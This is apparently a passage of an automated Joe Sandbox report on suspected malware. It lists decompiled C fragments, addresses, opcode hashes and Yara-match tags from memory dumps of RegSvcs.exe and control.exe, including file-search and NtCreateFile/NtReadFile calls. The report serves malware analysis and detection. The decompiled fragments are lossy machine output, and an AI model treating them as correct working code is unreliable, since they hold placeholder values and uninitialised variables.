
C-Code - Quality: 100%

			E00A736CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L00A64620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}

0x00a736d2
0x00a736e8
0x00a736d4
0x00a736e5
0x00a736e5

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction ID: fe9a2ca8ce424f5054b9626694fc8b20326ff98a97d52f491016b82e268e5f74
Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction Fuzzy Hash: 0CC02B75190440BBDB152F30CE11F16B264FB01B21F6403547220454F0D5289C00E100

Uniqueness

Uniqueness Score: -1.00%

Function 00A67D50 Relevance: .0, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A67D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}

0x00a67d56
0x00a67d5b
0x00a67d60
0x00a67d5d
0x00a67d5d
0x00a67d5d

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction ID: 31a404d208e97cbc3806992b34ff7084f76ee7fde99b79213db3eb7bf923051d
Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction Fuzzy Hash: 76B09234311940CFDE16DF18C080B1933F4BB44B44B8404D0E400CBA20D229E8008900

Uniqueness

Uniqueness Score: -1.00%

Function 00A72ACB Relevance: .0, Instructions: 5
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A72ACB() {
				void* _t5;

				return E00A5EB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}

0x00a72adc

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction ID: b495094ac82d178c65d0451557c4f6bd112b26c26b8203ddc37663e6cf0a329d
Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction Fuzzy Hash: 6AB01232D10440CFCF06EF40C710B1D7331FB00751F068490A40127931C238AD01CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00A898A0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7950abf88d01a1afedbd19b4518e49242c782968efdd0541919b4717b3de7e79
Instruction ID: 771c9f8dd7e6b9c415dca7d05639f0d2ccff4c3f4c3a972c0323867e12b2c485
Opcode Fuzzy Hash: 7950abf88d01a1afedbd19b4518e49242c782968efdd0541919b4717b3de7e79
Instruction Fuzzy Hash: 0890026130100402D602616945146060049D7D1385F91C022E1414555D86658D93F172

Uniqueness

Uniqueness Score: -1.00%

Function 00A89820 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2712260031aec7ed14150851389a1bad3c04536ccdc25209a81040221df0dcc
Instruction ID: 0d98037b32c285c1be7b973264e13876fe9e344e21e3edcf1a9c2b10d797f161
Opcode Fuzzy Hash: c2712260031aec7ed14150851389a1bad3c04536ccdc25209a81040221df0dcc
Instruction Fuzzy Hash: 9890027134100402D641716945046060049A7D0381F91C022A0414554E86958E96FAB1

Uniqueness

Uniqueness Score: -1.00%

Function 00A8B040 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0318fc6fe36c500155595a5173ac88fa52014afb2812d36d5b3dc5577a965d47
Instruction ID: 9720dea34f3837649af32bb8fbf22cd41ec6014d8377879f51cde356f898fc77
Opcode Fuzzy Hash: 0318fc6fe36c500155595a5173ac88fa52014afb2812d36d5b3dc5577a965d47
Instruction Fuzzy Hash: 889002A1701140434A40B16949044065055A7E1341391C131A0444560C86A88C95E2B5

Uniqueness

Uniqueness Score: -1.00%

Function 00A899D0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fc0d4bb63e89b5d06f0dded0672f68592f13a4c7cbbf3f549222861066df6f1
Instruction ID: 3b57e78145e68bea125a06aded8a3afc87d5a114da634121e1291d2be9d5af34
Opcode Fuzzy Hash: 8fc0d4bb63e89b5d06f0dded0672f68592f13a4c7cbbf3f549222861066df6f1
Instruction Fuzzy Hash: 1F9002A131100042D60461694504706008597E1341F51C022A2144554CC5698CA1A175

Uniqueness

Uniqueness Score: -1.00%

Function 00A89950 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95ec120e990bb1484aab8daa161718b73b56049b5956c48a7c4a2449e17ffc9a
Instruction ID: d7a0e11085a438e62a31e2fad99ca3159ec5b70d46a86bac3851d605a4e3c17b
Opcode Fuzzy Hash: 95ec120e990bb1484aab8daa161718b73b56049b5956c48a7c4a2449e17ffc9a
Instruction Fuzzy Hash: 299002A130140403D64065694904607004597D0342F51C021A2054555E8A698C91B175

Uniqueness

Uniqueness Score: -1.00%

Function 00A89A80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3eca88e25e42942e8561e21329ff4a3bd8eb209e4578b55b903ffdd94d41838
Instruction ID: beb2c16f84a4b72fca33f5672c68264411220d0ac60bbe2c3a346b2c68f9b36e
Opcode Fuzzy Hash: c3eca88e25e42942e8561e21329ff4a3bd8eb209e4578b55b903ffdd94d41838
Instruction Fuzzy Hash: 0490026130144442D64062694904B0F414597E1342F91C029A4146554CC9558C95A771

Uniqueness

Uniqueness Score: -1.00%

Function 00A89A10 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a710271cc4f2df81d60e03b53f98ee716b69824f6c652f66eb1c2bd52c9d6b0b
Instruction ID: 3f2ca82fbd4b3fb192fbb4e7788ec5b7c2eb44ecd8165fbbeed2d04bab2ecacf
Opcode Fuzzy Hash: a710271cc4f2df81d60e03b53f98ee716b69824f6c652f66eb1c2bd52c9d6b0b
Instruction Fuzzy Hash: 0B90027130140402D60061694908747004597D0342F51C021A5154555E86A5CCD1B571

Uniqueness

Uniqueness Score: -1.00%

Function 00A8A3B0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3df3da9873099f24fd57853a7d6ce6021e2eaecd3b037c7eb765212c0f8b3236
Instruction ID: c3c29f4d0c9306611a55a57b4939b7aa1943d2b344c55c21d7748febc5925c4e
Opcode Fuzzy Hash: 3df3da9873099f24fd57853a7d6ce6021e2eaecd3b037c7eb765212c0f8b3236
Instruction Fuzzy Hash: 2990027130144002D6407169854460B5045A7E0341F51C421E0415554C86558C96E271

Uniqueness

Uniqueness Score: -1.00%

Function 00A89B00 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f61c3ea14740abde8d390f22b15d46ab4f69d56aad556622e2342884ca9df9e5
Instruction ID: 12089bf67d80b659cff15c6774ac7c216bed31a6019e2b1c6d5bf32992a3967d
Opcode Fuzzy Hash: f61c3ea14740abde8d390f22b15d46ab4f69d56aad556622e2342884ca9df9e5
Instruction Fuzzy Hash: 9690026134100802D640716985147070046D7D0741F51C021A0014554D86568DA5B6F1

Uniqueness

Uniqueness Score: -1.00%

Function 00A895F0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32aa0420847c5ea0548796420ba9ba67696462dda21894d5a9d9dddaf1d96d5d
Instruction ID: 6737a8372b3c9291bdfd624091cb37c7a281c2a77834dec4ae3328479d6a29dc
Opcode Fuzzy Hash: 32aa0420847c5ea0548796420ba9ba67696462dda21894d5a9d9dddaf1d96d5d
Instruction Fuzzy Hash: 8C90027130100802D60461694904686004597D0341F51C021A6014655E96A58CD1B171

Uniqueness

Uniqueness Score: -1.00%

Function 00A89520 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57882adb0c375e3bc73cdf2ebf4f3a3866abb1353d940584bdd316e2f84fe556
Instruction ID: b8db5e65f3cf74316715a3923403975343e92582cb107beaf3ea4c46b2095020
Opcode Fuzzy Hash: 57882adb0c375e3bc73cdf2ebf4f3a3866abb1353d940584bdd316e2f84fe556
Instruction Fuzzy Hash: 3E9002E1301140924A00A2698504B0A454597E0341B51C026E1044560CC5658C91E175

Uniqueness

Uniqueness Score: -1.00%

Function 00A8AD30 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08074c6e78ed0332fbb54c6a7155569ad2d5e538ef4ef8b84e6d40bb512aebbe
Instruction ID: e2c98c2386464bbe2b7ca6cbf9a525f8c2aeb6b889359b601a261033d0df8801
Opcode Fuzzy Hash: 08074c6e78ed0332fbb54c6a7155569ad2d5e538ef4ef8b84e6d40bb512aebbe
Instruction Fuzzy Hash: 2B900271B05000129640716949146464046A7E0781B55C021A0504554C89948E95A3F1

Uniqueness

Uniqueness Score: -1.00%

Function 00A89560 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cdf8802c0eea107c45c2bca1bbfb76510909b9d5d58beea4bad2fece5af2a19
Instruction ID: 67bd6f80edd470bb8af22109702836f82c2fee9c8f6fd849c8255adda46aaf74
Opcode Fuzzy Hash: 3cdf8802c0eea107c45c2bca1bbfb76510909b9d5d58beea4bad2fece5af2a19
Instruction Fuzzy Hash: AD900265321000020645A569070450B0485A7D6391391C025F1406590CC6618CA5A371

Uniqueness

Uniqueness Score: -1.00%

Function 00A896D0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fb76ee5f1c51a40c02a8bb30df5092d3ddc75e86a5000830a4da779494057e9
Instruction ID: 3118244a0c51de7a2ed0fec78e0334eecdf2fd3bf9dbdcb9b765e0b424623ca7
Opcode Fuzzy Hash: 5fb76ee5f1c51a40c02a8bb30df5092d3ddc75e86a5000830a4da779494057e9
Instruction Fuzzy Hash: B290027130100842D60061694504B46004597E0341F51C026A0114654D8655CC91B571

Uniqueness

Uniqueness Score: -1.00%

Function 00A89610 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b83100696d4c3e23833f01750c66ca38ad3c8c10d73a8010a28c29bebbcc1889
Instruction ID: 06f16a2278f3983d0d6b4fa3d4b15a7ae900910ad951d1de147198a5bae4cd56
Opcode Fuzzy Hash: b83100696d4c3e23833f01750c66ca38ad3c8c10d73a8010a28c29bebbcc1889
Instruction Fuzzy Hash: 8D90027170500802D65071694514746004597D0341F51C021A0014654D87958E95B6F1

Uniqueness

Uniqueness Score: -1.00%

Function 00A89650 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ef1844080746722faf8c360720d313b8a1990d7c0273c903bcdebb3d98b7a51
Instruction ID: 95ffa3a352568ef7c3927f0f1e856084b6cefcbe56b75c3fb679e861b8f77c77
Opcode Fuzzy Hash: 7ef1844080746722faf8c360720d313b8a1990d7c0273c903bcdebb3d98b7a51
Instruction Fuzzy Hash: B090027130504842D64071694504A46005597D0345F51C021A0054694D96658D95F6B1

Uniqueness

Uniqueness Score: -1.00%

Function 00A89730 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6227d193a222353bb54f461c329d650e01ff2ba541be3afe8d8c2a6250e579e
Instruction ID: ceca1c1bebe938ae219abbe481aae65a67080224ca89ed9b876a2b8c25f9d6b6
Opcode Fuzzy Hash: b6227d193a222353bb54f461c329d650e01ff2ba541be3afe8d8c2a6250e579e
Instruction Fuzzy Hash: D790026170500402D64071695518706005597D0341F51D021A0014554DC6998E95B6F1

Uniqueness

Uniqueness Score: -1.00%

Function 00A8A710 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 475af2293916ed2ff258a980c3a2ccbcf1cb2ca736dd0266fd7bc675cf040236
Instruction ID: cbce76254ae9ac07440617dc70de64b1ff8bbe1808ea44cab8235c5f4386b7ed
Opcode Fuzzy Hash: 475af2293916ed2ff258a980c3a2ccbcf1cb2ca736dd0266fd7bc675cf040236
Instruction Fuzzy Hash: 2A900271301000529A00A6A95904A4A414597F0341B51D025A4004554C85948CA1A171

Uniqueness

Uniqueness Score: -1.00%

Function 00A89760 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c88b30c843b8574325fc7204bcc8f1e187dc2108daab9648136b2b7605798790
Instruction ID: 20cbfe3b8be68862b459dbe26262ea35394654c42718dbe2e7395efb55fbe641
Opcode Fuzzy Hash: c88b30c843b8574325fc7204bcc8f1e187dc2108daab9648136b2b7605798790
Instruction Fuzzy Hash: 3890027130100403D60061695608707004597D0341F51D421A0414558DD6968C91B171

Uniqueness

Uniqueness Score: -1.00%

Function 00A89770 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50af4ff5fa1d1fd80c85ac993fe0bffe7c46e4e5e213e397645164bf39b16890
Instruction ID: 7ea418372ea72d11d76b2b5030d699d36880516bb5cf0ea077d452b1db5b884e
Opcode Fuzzy Hash: 50af4ff5fa1d1fd80c85ac993fe0bffe7c46e4e5e213e397645164bf39b16890
Instruction Fuzzy Hash: AB90026130504442D60065695508A06004597D0345F51D021A1054595DC6758C91F171

Uniqueness

Uniqueness Score: -1.00%

Function 00A8A770 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e57730a5e9ac3e8a5dc1ced1222c2b6a436daef9f1aa62e9d29893c4713207aa
Instruction ID: 04d3663b7177a89e5f3f7c99cb0d25b32c951a32f158c68b443c828c24b82cc5
Opcode Fuzzy Hash: e57730a5e9ac3e8a5dc1ced1222c2b6a436daef9f1aa62e9d29893c4713207aa
Instruction Fuzzy Hash: 9E90027530504442DA0065695904A87004597D0345F51D421A041459CD86948CA1F171

Uniqueness

Uniqueness Score: -1.00%

Function 00A89670 Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: 6d99449aebb8bdca939e63573e64ca59759bf09b1aa49a63a940c7136468e2fe
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00ADFDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00ADFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E00A8CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E00AD5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E00AD5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x00adfdda
0x00adfde2
0x00adfde5
0x00adfdec
0x00adfdfa
0x00adfdff
0x00adfe0a
0x00adfe0f
0x00adfe17
0x00adfe1e
0x00adfe19
0x00adfe19
0x00adfe19
0x00adfe20
0x00adfe21
0x00adfe22
0x00adfe25
0x00adfe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00ADFDFA

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00ADFE2B
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00ADFE01

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 2af26f8030f6cea4e1e39de33fd735e67384956a4ae27ca77136d42ffe200e0e
Instruction ID: a0ce939577875d647652ce031a50d942c60cd220defdfdc91de7b6b4fa45c589
Opcode Fuzzy Hash: 2af26f8030f6cea4e1e39de33fd735e67384956a4ae27ca77136d42ffe200e0e
Instruction Fuzzy Hash: 1FF0F632600601BFDA201A55DD02F23BB6AFB44730F244715F629566E1DA62F82097F0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: control.exePID: 3608, Parent PID: 3352COMMON

Executed Functions

Function 00E4FA8B Relevance: 4.6, APIs: 3, Instructions: 103
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,00000000), ref: 00E4FB5F
FindNextFileW.KERNELBASE(?,00000010), ref: 00E4FB9E
FindClose.KERNELBASE(?), ref: 00E4FBA9

Memory Dump Source

Source File: 0000000B.00000002.820651114.0000000000E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e40000_control.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: e71b9529abfbc813cbbcc8619141f0caa8eae2c2ccb58038b584e7f97bd0a9c9
Instruction ID: 78d033a09e9bd03e13ed41a20692148057b54b28f259149a7974d2d0588a5e5a
Opcode Fuzzy Hash: e71b9529abfbc813cbbcc8619141f0caa8eae2c2ccb58038b584e7f97bd0a9c9
Instruction Fuzzy Hash: D43184B1900308BBDB21DFA4DC85FEF77BCEF85B05F144559F909B6181D670AA848BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00E4FA90 Relevance: 4.6, APIs: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,00000000), ref: 00E4FB5F
FindNextFileW.KERNELBASE(?,00000010), ref: 00E4FB9E
FindClose.KERNELBASE(?), ref: 00E4FBA9

Memory Dump Source

Source File: 0000000B.00000002.820651114.0000000000E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e40000_control.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: 94ac2383ed33b1ff8722f515b1c9270529150a0752c82e9c8a819ec8a924b7c1
Instruction ID: 3a31eae887b0fea088ae4c1718b414c1e5cfb4de091e4ad8facc5d3c4e0e3382
Opcode Fuzzy Hash: 94ac2383ed33b1ff8722f515b1c9270529150a0752c82e9c8a819ec8a924b7c1
Instruction Fuzzy Hash: 873172B1900308BBDB21DFA4DC85FEF77BCEF85B05F144559F909B6181DA70AA848BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00E585DA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00E53BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00E53BB7,007A002E,00000000,00000060,00000000,00000000), ref: 00E5862D

Strings

.z`, xrefs: 00E5861D, 00E58628

Memory Dump Source

Source File: 0000000B.00000002.820651114.0000000000E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e40000_control.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 04acb8d6f5c54a776ef20192493a28e178322b5926b8b2d9f51526a0d332773c
Instruction ID: d2594c8dc7d7415817953b47f822efe33db6b49e645d8b8013e19a0e622add59
Opcode Fuzzy Hash: 04acb8d6f5c54a776ef20192493a28e178322b5926b8b2d9f51526a0d332773c
Instruction Fuzzy Hash: EE019DB2241108ABCB48CF99DC85EEB77E9AF8C354F158259FA1DA7251C630E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00E585E0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00E53BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00E53BB7,007A002E,00000000,00000060,00000000,00000000), ref: 00E5862D

Strings

.z`, xrefs: 00E5861D, 00E58628

Memory Dump Source

Source File: 0000000B.00000002.820651114.0000000000E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e40000_control.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: 439f3a4bf56e810f5934ac7c8f1243dfe7bd20090e71a06246df36c7d6379779
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: D1F0B2B2205208ABCB08CF98DC85EEB77EDAF8C754F158248FA0D97241C630E811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00E58690 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,1:,FFFFFFFF,?,r=,?,00000000), ref: 00E586D5

Strings

1:, xrefs: 00E586AC, 00E586B8

Memory Dump Source

Source File: 0000000B.00000002.820651114.0000000000E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e40000_control.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: 1:
API String ID: 2738559852-2982581301
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: 86442f4541eef15a9b087c757cb215c6bc7a1b097c6db8f1eb6240513a8a8131
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: 51F0A4B2200208ABCB14DF99DC85EEB77ADAF8C754F158648BE1DA7241D630E911CBA0

Uniqueness

Uniqueness Score: -1.00%

